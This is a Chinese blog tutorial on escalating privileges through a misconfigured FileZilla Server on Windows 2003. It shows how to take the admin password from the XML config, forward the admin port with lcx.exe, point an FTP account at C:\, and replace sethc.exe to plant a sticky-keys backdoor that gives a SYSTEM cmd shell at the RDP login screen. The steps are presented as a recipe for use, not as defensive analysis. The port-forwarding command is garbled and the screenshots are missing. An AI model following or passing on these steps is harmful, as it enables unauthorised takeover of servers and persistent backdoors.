提权教程:FileZilla 提权

Admin 2020-08-10 77人围观 ,发现0个评论 提权教程

1、 简介

 

 

FileZilla 是一个ftp服务器, 假如配置不严的,读取xml密码 可以执行一些简答的命令

默认安装目录

C:\Program Files\FileZilla Server\

 

提权教程:FileZilla 提权 Web安全 第1张

2、 提权

    FileZilla Server Interface.xml 
    <FileZillaServer>
        <Settings>
            <Item name="Last Server Address" type="string">127.0.0.1</Item>
            <Item name="Last Server Port" type="numeric">14147</Item>
            <Item name="Last Server Password" type="string">123456</Item>
            <Item name="Always use last server" type="numeric">1</Item>
        </Settings>
    </FileZillaServer>

本地ip 127.0.0.1 端口 14147 密码 123456

lcx.exe -tran 14148 127.0.0.114147

 提权教程:FileZilla 提权 Web安全 第2张

进行端口的转发

本地用同样版本的filezila server 是链接14148  端口

提权教程:FileZilla 提权 Web安全 第3张

ftp的用户密码在

提权教程:FileZilla 提权 Web安全 第4张


可以通过修改配置文件 或者修改这里的用户密码

提权教程:FileZilla 提权 Web安全 第5张

 

因为在2003系统 这个ftp服务器是以系统权限启动的,那么可以修改默认的位置 比如修改c盘

 提权教程:FileZilla 提权 Web安全 第6张


用账号 moonsec 密码 123456 登录ftp 就会登录到c盘

 提权教程:FileZilla 提权 Web安全 第7张

那么可以用cmd改名 替换sethc.exe 在连登录远程服务器的时候 在登录框 按五次shit键 就会弹出cms终端 那么就可以运行其他命令

 提权教程:FileZilla 提权 Web安全 第8张

请发表您的评论
请关注微信公众号
微信二维码
不容错过
Powered By 蚁人博客